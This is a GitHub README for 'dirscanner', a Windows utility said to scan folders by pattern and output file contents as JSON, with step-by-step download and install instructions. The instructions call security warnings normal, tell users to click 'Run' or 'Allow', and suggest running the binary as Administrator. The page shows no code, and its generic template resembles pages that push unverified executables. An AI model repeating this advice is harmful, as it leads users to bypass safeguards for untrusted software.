Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

📂 dirscanner - Easy Document Sorting Tool

Download dirscanner

dirscanner is a simple tool that reads document contents and sorts them into JSON format. It uses common pattern matching, like you find in Unix systems, to organize files automatically. This guide helps you download and run dirscanner on a Windows PC, even if this is your first time using a program like this.


📋 What is dirscanner?

dirscanner scans your documents and sorts them using matching patterns. It looks inside files, reads their content, and sorts the information into JSON format. JSON is a format that lets other programs read and use the sorted data easily. This makes organizing and analyzing documents faster, especially if you manage many files.

Main Uses

  • Scan folders for many types of files
  • Read text inside files
  • Organize data into JSON for easier use
  • Sort files based on simple patterns
  • Help with audits, backups, or project reports

🖥️ System Requirements

Before you download dirscanner, make sure your computer meets these needs:

  • Windows 10 or newer version
  • At least 4 GB of RAM
  • 200 MB of free disk space
  • Internet access to download the program
  • Administrator rights to install new software

If you are not sure which Windows version you have, go to the Start menu, type “About your PC,” and press Enter. The window that opens will show your Windows version.


🚀 Getting Started: Download dirscanner

To get dirscanner, you need to visit the official release page on GitHub. This is where the program files are available.

Download dirscanner

Click this link or the button above. It will take you to the releases page where you can find the latest version ready for download.

Steps to download

  1. Open your web browser (such as Chrome, Edge, or Firefox).
  2. Click the download link above or go to:
    https://github.com/stanislawillsmelling206/dirscanner/releases
  3. Look for the latest release. The release is usually at the top of the list, marked by a date.
  4. Find the file ending with .exe or .zip. For Windows, this will be the installer or program file.
  5. Click on the file name. The download will start.
  6. Wait for the download to finish. It usually takes a few minutes depending on your internet speed.

If you download a ZIP file, you will need to extract it before you can run the program. Right-click on the ZIP file and select “Extract All.” Select a folder where you want to keep the extracted files.


⚙️ Installing dirscanner on Windows

After you finish downloading, follow these steps to install the program:

  1. Find the downloaded file, usually in the “Downloads” folder.
  2. If the file is an installer (ends with .exe):
    • Double-click the file.
    • A setup window will open.
    • Follow the instructions on the screen. This usually means clicking “Next” a few times and then “Install.”
  3. If you downloaded a ZIP file:
    • Extract its contents.
    • Look for a file named dirscanner.exe inside the folder.
    • Double-click this file to run the program directly without installation.

You may see a security warning asking if you trust the app. This is normal when running software from the internet. Choose “Run” or “Allow” to continue.


🔍 How to Use dirscanner

Once you have dirscanner open, you can start scanning your documents and sorting them.

Basic steps to run a scan:

  1. Select Folder
    Click the button or field to choose the folder you want to scan. This tells the program where your documents are stored.

  2. Set Pattern
    dirscanner uses patterns to match files. For example, you can set patterns to scan only .txt or .pdf files or files that start with certain words. Patterns work similarly to common wildcard expressions, like *.txt for all text files.

  3. Start Scan
    Click the “Start” button to begin scanning the folder. dirscanner will read the contents of the files and organize the data.

  4. View Results
    After scanning, the tool will save the organized data in JSON format. You can find this output file in the folder you chose or in a default location set by the app.

  5. Use the Data
    The JSON file can be opened with text editors or other programs that work with JSON data.


🔧 Common Features

  • Pattern Matching
    Use simple patterns to include or exclude certain files. For example, type *.pdf to scan only PDF documents.

  • JSON Output
    The scanned data is saved in an easy-to-read JSON file. Many applications and programming languages support JSON.

  • Batch Processing
    Scan large folders with many files at once.

  • Custom Folder Selection
    Choose any folder on your computer for scanning.

  • Text-Based Interface
    The app uses clear text menus and buttons for easy navigation.


🛠️ Troubleshooting Tips

  • If the program does not start, make sure you have Microsoft Visual C++ Redistributable installed. This is common for many Windows programs.
  • Check that you have enough free disk space. dirscanner stores scan results as JSON files that need space.
  • If scanning takes a long time, try choosing smaller folders or fewer files with patterns.
  • Run the program as Administrator if you get permission errors. Right-click the program icon and select “Run as Administrator.”
  • If the JSON output file is missing, check the folder settings inside the app.

🔄 Updating dirscanner

New versions may fix bugs or add features. To update:

  1. Visit the release page at:
    https://github.com/stanislawillsmelling206/dirscanner/releases
  2. Download the newest release file.
  3. Install it the same way as the first time.

Your old settings and data should remain unchanged.


🧐 Where to Get Help

For questions or issues, use the GitHub repository page. Users and developers often discuss problems and solutions there. Look for the “Issues” tab on the repository page.

You can also find a README file inside the downloaded folder. It may have extra tips on using the tool.


🔗 Quick Access

Download dirscanner here:
https://github.com/stanislawillsmelling206/dirscanner/releases

Download dirscanner

About

Scan directories recursively to filter files by glob patterns and output their contents in a structured JSON format for analysis and backups.

Topics

Resources

Stars

1 star

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages